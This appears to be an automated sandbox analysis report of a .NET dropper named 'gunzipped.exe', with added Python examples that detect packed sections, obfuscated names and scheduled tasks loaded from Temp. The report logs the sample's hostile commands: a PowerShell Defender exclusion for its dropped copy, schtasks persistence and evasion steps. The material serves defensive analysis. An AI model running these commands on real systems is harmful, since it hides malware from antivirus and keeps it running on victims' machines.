                      Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, MJclrqZHjO7Fdl7QeF.cs | High entropy of concatenated method names: 'qu4e3Ik1Mh', 'nlkewg5aJx', 'cXCEIA5YP7', 'mVEEPqWQmP', 'z2Rej2TYJg', 'XmReGaTvJv', 'mY0eQmwCc7', 'qT0eBqeccR', 'iCQevDXc5Z', 'DRBeCy2avH'
                      Source: C:\Users\user\Desktop\gunzipped.exe | File created: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe
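The two entropy measurements in this section (the 7.958-bit .text section of both the sample and the dropped copy, and the "High entropy of concatenated method names" rows) are the report's packer and name-obfuscation heuristics. The Python below is an added example, not part of the Joe Sandbox report, that reproduces both on constructed input: it walks a PE section table with struct, scores each section's raw bytes, and scores the joined method names of a class. The thresholds, the synthetic PE and the "normal" TypeConverter method names are assumptions of this example; the obfuscated names are copied from one of the flagged classes above.

```python
import math
import random
import struct
from collections import Counter


def shannon_entropy(data) -> float:
    """Shannon entropy in bits per symbol: 0.0 for a constant buffer, up to 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


# Assumed cut-offs for this example; the report prints measured values, not its own thresholds.
PACKED_SECTION_THRESHOLD = 7.5    # compiled x86 code rarely exceeds ~6.5 bits; 7.5+ means compressed/encrypted
OBFUSCATED_NAMES_THRESHOLD = 4.5  # English-like identifiers concatenate to roughly 3.5-4.2 bits per character


def pe_section_entropies(pe: bytes) -> dict:
    """Walk the PE section table with struct (no pefile dependency) and return {section name: entropy}."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + size_of_optional           # section headers follow the optional header
    result = {}
    for i in range(num_sections):
        hdr = table + i * 40                       # IMAGE_SECTION_HEADER is 40 bytes
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        size_raw, ptr_raw = struct.unpack_from("<II", pe, hdr + 16)   # SizeOfRawData, PointerToRawData
        result[name] = shannon_entropy(pe[ptr_raw:ptr_raw + size_raw])
    return result


def packed_sections(pe: bytes) -> list:
    """Names of sections whose raw bytes exceed the packing threshold."""
    return [n for n, h in pe_section_entropies(pe).items() if h > PACKED_SECTION_THRESHOLD]


def method_name_entropy(names) -> float:
    """Entropy of all method names of one class joined together, as the report's heuristic measures it."""
    return shannon_entropy("".join(names))


def looks_obfuscated(names) -> bool:
    return method_name_entropy(names) > OBFUSCATED_NAMES_THRESHOLD


def build_pe(sections: dict) -> bytes:
    """Constructed test input: a minimal PE32 image (valid headers, not loadable) around {name: raw bytes}."""
    e_lfanew, opt_size = 0x40, 224
    header_len = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    data_off = (header_len + 0x1FF) & ~0x1FF       # raw data starts on a 512-byte file alignment
    img = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    img += b"PE\0\0"
    img += struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)  # COFF: i386, EXE
    img += b"\0" * opt_size
    bodies = b""
    for name, raw in sections.items():
        img += name.encode().ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", len(raw), 0, len(raw), data_off + len(bodies), 0, 0, 0, 0, 0x60000020)
        bodies += raw
    img += b"\0" * (data_off - len(img))
    return bytes(img) + bodies


# Constructed sections: seeded pseudo-random bytes stand in for a packed .text like the 7.958-bit one
# in the report, beside an ordinary string table that a normal .rdata would hold.
_rng = random.Random(1)
SAMPLE_PE = build_pe({
    ".text": bytes(_rng.getrandbits(8) for _ in range(4096)),
    ".rdata": b"CanConvertFrom\0ConvertFrom\0ConvertTo\0" * 100,
})

# Method names copied from one flagged class above, beside an ordinary TypeConverter's names (assumed).
OBFUSCATED_NAMES = ['KF9Pon0STn', 't69PA64Vkc', 'aSHPmrCiA0', 'a1rPqTDHiJ', 'cinPLnmYq6',
                    'gk2P2qw6Ic', 'oKIMS2CuiiVo5VmgFu', 'G7NL27uA9aAZJn0qPy', 'slxPPNKHnk', 'QahPtBKE1q']
NORMAL_NAMES = ['CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ToString', 'Dispose']

if __name__ == "__main__":
    for name, h in pe_section_entropies(SAMPLE_PE).items():
        print(f"{name:8s} entropy={h:.3f}")
    print("packed sections:", packed_sections(SAMPLE_PE))
    print("obfuscated:", looks_obfuscated(OBFUSCATED_NAMES), "normal:", looks_obfuscated(NORMAL_NAMES))
```

Run against a real file with `pe_section_entropies(open(path, "rb").read())`. A .text entropy near 8 bits, as both the sample and its dropped copy show, means the section is carrying a payload rather than compiled code; the real code only appears after the unpacker's `Assembly.Load(byte[])` runs, which is why the report's Yara hits are on memory dumps and unpacked regions rather than on the file.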

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\gunzipped.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp"
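The task above is registered from an XML definition staged under the user's Temp folder, which is exactly the condition behind the "Scheduled temp file as task from temp location" Sigma detection listed in the report's signature summary. The Python below is an added example, not taken from the report or from the Sigma rule, that runs this check over constructed process-creation command lines and additionally inspects the task definition for actions that execute from a user-writable path. The first command line is the one recorded above; the two benign look-alikes and the task XML are constructed, since the report gives the tmp510D.tmp file name but not its contents (the Roaming-path command is an assumption based on the dropped file the report lists).

```python
import re
import xml.etree.ElementTree as ET

# Constructed process-creation records shaped like the report's "Process created" entry. Only the first
# is the sample's real command line; the other two are benign contrasts, not telemetry from the analysis.
SAMPLE_EVENTS = [
    r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp"',
    r'schtasks.exe /Create /TN "Backup" /XML "C:\ProgramData\Vendor\backup-task.xml"',
    r'schtasks.exe /Query /TN "Updates\mPvIOxEZXJsdYp"',
]

# Assumed contents of the temp XML, written in the Task Scheduler schema that schtasks /XML consumes.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe</Command></Exec>
  </Actions>
</Task>"""

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
TEMP_DIR = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)


def xml_path_from_cmdline(cmdline: str):
    """Return the /XML argument of a 'schtasks /Create' command line, or None for anything else."""
    if not re.search(r"(?:^|\s)/Create(?:\s|$)", cmdline, re.IGNORECASE):
        return None
    m = re.search(r'/XML\s+(?:"([^"]+)"|(\S+))', cmdline, re.IGNORECASE)
    return (m.group(1) or m.group(2)) if m else None


def is_temp_xml_task(cmdline: str) -> bool:
    """The 'scheduled task created from an XML file in a temp location' condition."""
    path = xml_path_from_cmdline(cmdline)
    return bool(path and TEMP_DIR.search(path))


def task_commands(xml_text: str) -> list:
    """Every <Command> under <Actions>/<Exec> in a Task Scheduler XML definition."""
    root = ET.fromstring(xml_text)
    return [(c.text or "").strip() for c in root.findall(".//t:Actions/t:Exec/t:Command", TASK_NS)]


def triage(cmdlines, xml_files: dict) -> list:
    """Pair each schtasks /Create with its XML (keyed by lower-cased path) and collect reasons to alert."""
    findings = []
    for cmdline in cmdlines:
        path = xml_path_from_cmdline(cmdline)
        if path is None:
            continue
        reasons = []
        if TEMP_DIR.search(path):
            reasons.append("task definition staged in a temp directory: " + path)
        # If the XML was not captured, fall back to an empty task so only the path check applies.
        for cmd in task_commands(xml_files.get(path.lower(), "<Task/>")):
            if USER_WRITABLE.search(cmd):
                reasons.append("task action runs from a user-writable path: " + cmd)
        if reasons:
            findings.append((cmdline, reasons))
    return findings


SAMPLE_XML_FILES = {r"c:\users\user\appdata\local\temp\tmp510d.tmp": SAMPLE_TASK_XML}

if __name__ == "__main__":
    for cmdline, reasons in triage(SAMPLE_EVENTS, SAMPLE_XML_FILES):
        print(cmdline)
        for reason in reasons:
            print("  -", reason)
```

The temp-path condition alone is what the Sigma rule keys on and is cheap to evaluate from process-creation telemetry; the action check needs the XML itself, which is worth grabbing at the time of the alert because the malware deletes the staging file once the task exists. On a live host, `schtasks /Query /TN "Updates\mPvIOxEZXJsdYp" /XML` returns the same schema and can be fed straight into `task_commands`.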

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\gunzipped.exe | Process information set: NOOPENFILEERRORBOX (48 identical entries)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\gunzipped.exe    Process information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe    Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: Yara match | File source: Process Memory Space: gunzipped.exe PID: 6640, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: mPvIOxEZXJsdYp.exe PID: 7368, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\gunzipped.exe | Memory allocated: F80000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\gunzipped.exe | Memory allocated: 2D40000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\gunzipped.exe | Memory allocated: 2B80000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\gunzipped.exe | Memory allocated: 7B70000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\gunzipped.exe | Memory allocated: 8B70000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\gunzipped.exe | Memory allocated: 8D20000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\gunzipped.exe | Memory allocated: 9D20000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\gunzipped.exe | Memory allocated: A2D0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\gunzipped.exe | Memory allocated: B2D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Memory allocated: 2B70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Memory allocated: 2DA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Memory allocated: 2BB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Memory allocated: 7AC0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Memory allocated: 7070000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Memory allocated: 8AC0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Memory allocated: 9AC0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Memory allocated: 9ED0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Memory allocated: AED0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Memory allocated: BED0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\gunzipped.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7546
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2211
                      Source: C:\Users\user\Desktop\gunzipped.exe TID: 5324 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7356 | Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Users\user\Desktop\gunzipped.exe TID: 7332 | Thread sleep time: -120000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe TID: 7388 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Users\user\Desktop\gunzipped.exe | Thread delayed: delay time: 60000
                      Source: mPvIOxEZXJsdYp.exe, 0000000D.00000002.1741727533.00000000011F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
                      Source: gunzipped.exe, 00000007.00000002.1966713417.0000000000C28000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
                      Source: C:\Users\user\Desktop\gunzipped.exe | Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 13_2_0040317B mov eax, dword ptr fs:[00000030h] | 13_2_0040317B
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 13_2_00402B7C GetProcessHeap,HeapAlloc, | 13_2_00402B7C
                      Source: C:\Users\user\Desktop\gunzipped.exe | Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\gunzipped.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\gunzipped.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"
                      Source: C:\Users\user\Desktop\gunzipped.exe | Memory written: C:\Users\user\Desktop\gunzipped.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Memory written: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\gunzipped.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp"
                      Source: C:\Users\user\Desktop\gunzipped.exe | Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp5B1F.tmp"
                      Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Process created: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Users\user\Desktop\gunzipped.exe VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\gunzipped.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
